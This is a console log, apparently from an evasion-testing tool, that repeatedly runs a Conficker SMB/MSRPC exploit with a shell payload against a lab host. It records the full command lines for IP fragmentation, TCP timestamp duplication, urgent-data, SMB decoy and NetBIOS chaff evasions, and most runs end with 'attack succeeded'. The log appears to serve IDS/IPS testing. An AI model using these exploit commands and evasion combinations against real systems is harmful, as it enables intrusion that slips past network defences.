- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11004 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=4E57Ty3TjkE --evasion=[start,smb_opentree]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","134958172","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 4E57Ty3TjkH
- The following evasions are applied from stage start to smb_opentree:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 134958172> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:11004 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .........
- 3377 runs averaging 1.96 runs / second ; progress: 1720/43200...............
- 3392 runs averaging 1.97 runs / second ; progress: 1725/43200......................
- 3414 runs averaging 1.97 runs / second ; progress: 1730/43200.....Pid 21788 timed out - killed
- 2015-06-07 23:48:21 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60318 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=u0yyOW7fX0Q --evasion=[smb_connect,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed u0yyOW7fX0S
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.114:60318 -> 10.35.1.207:445
- Terminated
- ..............
- 3434 runs averaging 1.98 runs / second ; progress: 1735/43200......
- 3440 runs averaging 1.98 runs / second ; progress: 1740/43200......
- 3446 runs averaging 1.97 runs / second ; progress: 1745/43200..........
- 3456 runs averaging 1.97 runs / second ; progress: 1750/43200.....................
- 3477 runs averaging 1.98 runs / second ; progress: 1755/43200.......
- 3484 runs averaging 1.98 runs / second ; progress: 1760/43200....2015-06-07 23:48:55 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25246 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=JW20JsGXHvY --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcreq" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed JW20JsGXHvY
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.115:25246 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 3489 runs averaging 1.98 runs / second ; progress: 1766/43200.........
- 3498 runs averaging 1.98 runs / second ; progress: 1771/432002015-06-07 23:49:00 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56190 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=0a5UmP7w6is --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","3","8","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 0a5UmP7w6iv
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
- Info: NetBIOS connection 10.62.90.110:56190 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-07 23:49:01 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41902 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q5L+wNSEXnI --evasion=[netbios_connect,end]tcp_paws,"50%","9","shuffle" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Q5L+wNSEXnJ
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:41902 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 3512 runs averaging 1.98 runs / second ; progress: 1776/43200....2015-06-07 23:49:08 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15024 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=95HG3rTHFuU --evasion=[smb_connect,end]tcp_paws,"5","4","random" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 95HG3rTHFuX
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:15024 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 3525 runs averaging 1.98 runs / second ; progress: 1781/43200.......2015-06-07 23:49:15 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49718 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=v9g23QstAps --evasion=[msrpc_req,end]tcp_paws,"1","6","shuffle30" --evasion=[smb_opentree,smb_openpipe]tcp_urgent,"21","random" --verifydelay=1000 --payload=shell
- Info: Using random seed v9g23QstApu
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Add a random urgent data byte to every 21 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.114:49718 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3533 runs averaging 1.98 runs / second ; progress: 1786/43200...
- 3536 runs averaging 1.97 runs / second ; progress: 1791/43200.........
- 3545 runs averaging 1.97 runs / second ; progress: 1796/43200.............
- 3558 runs averaging 1.98 runs / second ; progress: 1801/43200..Pid 22433 timed out - killed
- 2015-06-07 23:49:31 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64787 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=dTcq453vXsM --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","3","5","random_msrpcbind" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed dTcq453vXsN
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 5 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.111:64787 -> 10.35.1.207:445
- Terminated
- ......
- 3567 runs averaging 1.98 runs / second ; progress: 1806/43200....
- 3571 runs averaging 1.97 runs / second ; progress: 1811/43200.....2015-06-07 23:49:45 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47268 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=EyGsPHL3uk8 --evasion=[smb_connect,end]ipv4_frag,"64" --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed EyGsPHL3uk8
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.118:47268 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 3578 runs averaging 1.97 runs / second ; progress: 1816/43200.......2015-06-07 23:49:48 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59606 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=uzhULV6jsqk --evasion=[start,end]tcp_initialseq,"2412100352" --evasion=[smb_opentree,end]tcp_paws,"5","162865477","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed uzhULV6jsqm
- - Initial TCP sequence number is set to 0xffffffff - 2412100352
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162865477> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.115:59606 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....2015-06-07 23:49:49 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=cDSiqqCXSA0 --evasion=[netbios_connect,smb_connect]netbios_chaff,"5","empty_unspec|empty_keepalive|http_get" --evasion=[start,end]tcp_paws,"1","6","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","167083599","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed cDSiqqCXSA1
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 167083599> and has shuffled original payload
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
- Info: NetBIOS connection 10.62.90.110:17836 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 3596 runs averaging 1.98 runs / second ; progress: 1821/43200...........
- 3607 runs averaging 1.98 runs / second ; progress: 1826/43200.............
- 3620 runs averaging 1.98 runs / second ; progress: 1831/43200............
- 3632 runs averaging 1.98 runs / second ; progress: 1836/43200.......
- 3639 runs averaging 1.98 runs / second ; progress: 1841/43200.
- 3640 runs averaging 1.97 runs / second ; progress: 1846/43200.Pid 23089 timed out - killed
- 2015-06-07 23:50:20 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24335 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OwJGCORFO5M --evasion=msrpc_bigendian --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed OwJGCORFO5M
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - MSRPC messages are sent in the big endian byte order
- Info: NetBIOS connection 10.62.90.117:24335 -> 10.35.1.207:445
- Terminated
- ..
- 3644 runs averaging 1.97 runs / second ; progress: 1851/43200...........
- 3655 runs averaging 1.97 runs / second ; progress: 1856/43200..........
- 3665 runs averaging 1.97 runs / second ; progress: 1861/43200..........
- 3675 runs averaging 1.97 runs / second ; progress: 1866/43200..........
- 3685 runs averaging 1.97 runs / second ; progress: 1871/43200........
- 3693 runs averaging 1.97 runs / second ; progress: 1876/43200...............
- 3708 runs averaging 1.97 runs / second ; progress: 1881/43200.........
- 3717 runs averaging 1.97 runs / second ; progress: 1886/43200.....
- 3722 runs averaging 1.97 runs / second ; progress: 1891/43200...2015-06-07 23:51:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52841 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BoBFFh41OV0 --evasion=[smb_connect,end]smb_decoytrees,"6","7","2","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed BoBFFh41OV0
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 6 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- Info: NetBIOS connection 10.62.90.118:52841 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3726 runs averaging 1.97 runs / second ; progress: 1896/43200........
- 3734 runs averaging 1.96 runs / second ; progress: 1901/43200......
- 3740 runs averaging 1.96 runs / second ; progress: 1906/43200..
- 3742 runs averaging 1.96 runs / second ; progress: 1911/43200.
- 3743 runs averaging 1.95 runs / second ; progress: 1916/43200....
- 3747 runs averaging 1.95 runs / second ; progress: 1921/43200........
- 3755 runs averaging 1.95 runs / second ; progress: 1926/43200.....
- 3760 runs averaging 1.95 runs / second ; progress: 1931/43200.....
- 3765 runs averaging 1.94 runs / second ; progress: 1936/43200..
- 3767 runs averaging 1.94 runs / second ; progress: 1941/43200
- 3767 runs averaging 1.94 runs / second ; progress: 1946/43200
- 3767 runs averaging 1.93 runs / second ; progress: 1951/43200.Pid 24808 timed out - killed
- 2015-06-07 23:52:06 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12134 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5K839hgA4vk --evasion=[netbios_connect,smb_opentree]ipv4_frag,"40" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5K839hgA4vn
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:12134 -> 10.35.1.207:445
- Terminated
- 3769 runs averaging 1.93 runs / second ; progress: 1956/43200.........
- 3778 runs averaging 1.93 runs / second ; progress: 1961/43200.....
- 3783 runs averaging 1.92 runs / second ; progress: 1966/43200..........
- 3793 runs averaging 1.92 runs / second ; progress: 1971/43200...
- 3796 runs averaging 1.92 runs / second ; progress: 1976/43200
- 3796 runs averaging 1.92 runs / second ; progress: 1981/43200Pid 25171 timed out - killed
- 2015-06-07 23:52:33 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52248 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dytugDvpAqY --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","2","alpharandomized" --evasion=[netbios_connect,smb_opentree]tcp_segvar,"6","65535" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed dytugDvpAqZ
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP packets are segmented to contain between 6 and 65535 bytes of payload.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:52248 -> 10.35.1.207:445
- Terminated
- .....
- 3802 runs averaging 1.91 runs / second ; progress: 1986/43200.2015-06-07 23:52:37 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36884 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=s9eB1BzGzzo --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","268435454","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed s9eB1BzGzzq
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:36884 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 3811 runs averaging 1.91 runs / second ; progress: 1991/43200...............
- 3826 runs averaging 1.92 runs / second ; progress: 1996/43200....
- 3830 runs averaging 1.91 runs / second ; progress: 2002/43200........
- 3838 runs averaging 1.91 runs / second ; progress: 2007/43200........
- 3846 runs averaging 1.91 runs / second ; progress: 2012/43200.............
- 3859 runs averaging 1.91 runs / second ; progress: 2017/43200...Pid 25922 timed out - killed
- 2015-06-07 23:53:10 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54207 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=h6bw8nvRfdk --evasion=[msrpc_bind,msrpc_req]tcp_order,"rand" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"7","new","zero" --evasion=[smb_openpipe,end]tcp_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed h6bw8nvRfdm
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 7 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - TCP packets are segmented to contain at most 7 bytes of payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP segments produced by a single socket send() are sent in a random order
- Info: NetBIOS connection 10.62.90.116:54207 -> 10.35.1.207:445
- Terminated
- ..
- 3865 runs averaging 1.91 runs / second ; progress: 2022/43200.2015-06-07 23:53:13 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11317 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QVdIvWYv1gI --evasion=[smb_opentree,end]tcp_paws,"3","7","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed QVdIvWYv1gJ
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random alphaurgent data byte to every 5 TCP segment.
- Info: NetBIOS connection 10.62.90.113:11317 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 3870 runs averaging 1.91 runs / second ; progress: 2027/43200......
- 3876 runs averaging 1.91 runs / second ; progress: 2032/43200.2015-06-07 23:53:22 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62100 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=uZVoYbn3bLE --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_unspec|empty_keepalive|small_unspec|http_get|broken_length" --evasion=[smb_openpipe,end]tcp_paws,"8","102823530","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uZVoYbn3bLG
- The following evasions are applied from stage smb_openpipe to end:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 102823530> and has random alpha bytes as payload
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.118:62100 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 3890 runs averaging 1.91 runs / second ; progress: 2037/43200...............
- 3905 runs averaging 1.91 runs / second ; progress: 2042/43200..........
- 3915 runs averaging 1.91 runs / second ; progress: 2047/43200Pid 26530 timed out - killed
- 2015-06-07 23:53:37 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45731 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HlA8q8WZBQg --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_unspec","float_vax","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,msrpc_req]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed HlA8q8WZBQg
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage msrpc_bind to end:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * VAX floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.119:45731 -> 10.35.1.207:445
- Terminated
- .........
- 3925 runs averaging 1.91 runs / second ; progress: 2052/43200..............
- 3939 runs averaging 1.91 runs / second ; progress: 2057/43200.......
- 3946 runs averaging 1.91 runs / second ; progress: 2062/43200
- 3946 runs averaging 1.91 runs / second ; progress: 2067/43200
- 3946 runs averaging 1.90 runs / second ; progress: 2072/43200.........
- 3955 runs averaging 1.90 runs / second ; progress: 2077/43200.........
- 3964 runs averaging 1.90 runs / second ; progress: 2082/43200.........2015-06-07 23:54:16 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26191 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CWCzNaZMK7E --evasion=[start,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","212579014","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed CWCzNaZMK7E
- The following evasions are applied from stage start to msrpc_bind:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 212579014> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:26191 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .
- 3975 runs averaging 1.90 runs / second ; progress: 2087/43200...........
- 3986 runs averaging 1.91 runs / second ; progress: 2092/43200..Pid 27448 timed out - killed
- 2015-06-07 23:54:23 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63893 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TYsSONBPM0I --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"32" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed TYsSONBPM0J
